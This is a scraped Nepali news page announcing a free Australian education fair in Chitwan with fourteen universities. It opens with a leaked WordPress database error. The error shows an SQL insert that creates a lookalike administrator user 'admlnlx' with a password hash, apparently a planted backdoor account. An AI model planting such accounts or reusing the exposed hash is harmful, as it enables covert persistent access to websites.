WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFMUxhxBAaSs8q7mE.6KZppWRsve.u1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 01:31:21', '', 'admlnlx', 'admlnlx')
चितवन, माघ २–
वैदेशिक शिक्षामा जाने जिल्ला मध्यकै महत्वपूर्ण चितवनमा अहिलेसम्मकै ठूलो अष्ट्रेलियन एजुकेशन फेयर हुने भएको छ । उच्च शिक्षाका लागि अष्ट्रेलिया जान चाहने विद्यार्थीहरु लक्षित गर्दै नारायणगढमा रहेको ग्लोबल रिचले फेयर आयोजना गर्न लागेको हो ।
यही जनवरी २४ तारिख (माघ ११ गते) लायन्सचोकस्थित होटेल रेड कार्पेटमा फेयर आयोजना हुने ग्लोबल रिचका नारायणगढ शाखा प्रमुख सुरेश पौडेलले जानकारी दिनुभयो ।
एक दिने सो फेयर विहान ११ बजेदेखि अपरान्ह ४ बजेसम्म चल्ने छ । यस पटकको फेयरमा १४ वटा विश्वविद्यालयहरुको आधिकारिक प्रतिनिधिहरुको सहभागिता रहने छ । जसका कारण विद्यार्थीहरुले सहजै सबै सूचना पाउन सक्ने छन् । सो फेयरमा छात्रवृत्ति, स्पट एप्लिेशन, पोष्ट स्टडी वर्कलगायत बारे जानकारी पाउने छ ।
ग्लोबल रिचले चितवनका विद्यार्थीहरुका लागि पटक–पटक यस्तो प्रकारको एजुकेशन फेयर गर्दै आईरहेको छ ।
फेयरमा एसियु, युनिसा, युनिभर्सिटि अफ ओलोङगोङ, सिक्वी युनिभर्सिटि, कर्टिन युनिभर्सिटि, युटिएस इनसर्च, वेस्र्टन सिड्नी युनिभर्सिटि, सिएसयु, युनिभर्सिटि अफ न्यू इङल्याण्ड, नभिटास ग्रुप, कप्लान बिसनेस स्कूल, टोरेन्स युनिभर्सिटि, ल ट्रोव युनिभर्सिटिलगायतको सहभागिता रहने छ ।
फेयरमा सहभागि हुन निःशुल्क व्यवस्था गरिएको छ ।